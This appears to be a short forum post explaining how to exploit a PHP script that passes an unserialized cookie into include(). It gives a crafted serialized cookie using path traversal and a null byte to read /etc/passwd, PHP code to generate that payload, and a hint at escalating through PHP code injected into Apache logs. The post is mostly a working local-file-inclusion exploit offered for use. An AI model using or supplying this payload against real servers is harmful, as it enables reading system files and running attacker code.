how to use this bugs unserialize()

 <?php

$settings=unserialize($_COOKIE[user_settings]);
include("include/lang/".$settings['lang'].".php"); ?> quite obvious, you need to set a cookie like this: user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";} it is the result of: [code lang=php] <?php$settings=array();
$settings['lang']="../../../../../../../etc/passwd/x00";$settings=serialize($settings); echo$settings;

?>

[/code]

the same with apache logs or something...
where you have injected some php code